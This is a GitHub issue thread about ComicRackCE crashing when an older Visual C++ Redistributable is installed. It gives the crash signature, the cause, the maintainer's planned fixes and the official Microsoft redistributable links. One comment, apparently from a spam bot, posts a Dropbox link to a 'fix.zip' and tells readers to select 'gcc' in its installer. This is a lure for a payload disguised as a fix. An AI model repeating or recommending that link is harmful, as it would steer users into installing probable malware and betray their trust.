### ISSUE TITLE
Having an old version of VC++ installed would slow down dramatically the program.

### ISSUE THREAD

**Issue by maforget** [maforget/ComicRackCE#106]
**Describe the bug**
Very slow when reading or converting books. The program seems to constantly crash and start another process when doing so.

**Exact Steps to Reproduce**
Reading or Converting any comics will trigger the problem if you have Visual C++ Redistributable 14 (2015 to 2022) lesser than `14.40.33810.0`. Not having the Redistributable will not trigger the bug.

**Screenshots**
https://github.com/user-attachments/assets/18adf3df-2344-48a7-affd-36b4dd4b22d2

**Event Viewer**
```
<ProblemSignatures>
<EventType>APPCRASH</EventType>
<Parameter0>ComicRack.exe</Parameter0>
<Parameter1>0.0.0.0</Parameter1>
<Parameter2>66c64d03</Parameter2>
<Parameter3>MSVCP140.dll</Parameter3>
<Parameter4>14.29.30133.0</Parameter4>
<Parameter5>60ff28cc</Parameter5>
<Parameter6>c0000005</Parameter6>
<Parameter7>0000000000013020</Parameter7>
</ProblemSignatures>
``` 

**Version/Commit (check the about page, next to the version, for the string between brackets):**
 - Version: 0.9.180
 - Commit Affected:  Since 3e3192f03246c8f494aff4529fc8a16a0bcc6921

**Additional context**
This is because of a breaking change in Visual C++ that means that any binaries compiled with Visual Studio 2022 17.10+ will require the updated files. Since LibHeif was compiled recently it required these new files.
More info here => https://github.com/YehudaKremer/msix/issues/272#issuecomment-2177767145

**Possible Fix**
Having Visual C++ Redistributable `14.40.33810.0`+ is now a requirement for the program. This will be required either way to use HEIF/AVIF support.

- I will update the function that checks if a page is supported by LibHeif to use C# code instead of calling the Native function. I wanted the library itself to provide if it was compatible so just updating the binaries would be enough to update support for new types. I will at least check via the Native code only if the C# code says it was Supported. This will prevent problems with most user who don't interact with HEIF/AVIF files.
- Update the installer to force install the Visual C++ Redistributable `14.40.33810.0`+.
- Add a Note in the Readme for those that use the ZIP folder that not updating to the latest Visual C++ Redistributable will prevent functionality of the program.

**Update:** Because of bots trying to post shit Here is the link to the REAL updated VC++ from Microsoft.
https://aka.ms/vs/17/release/vc_redist.x86.exe
https://aka.ms/vs/17/release/vc_redist.x64.exe

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by maforget** [comment]
Installer will now install/update VC++ if required as of commit 846aa6d92e03c2f95135d01763e7cdc4e6ed9366
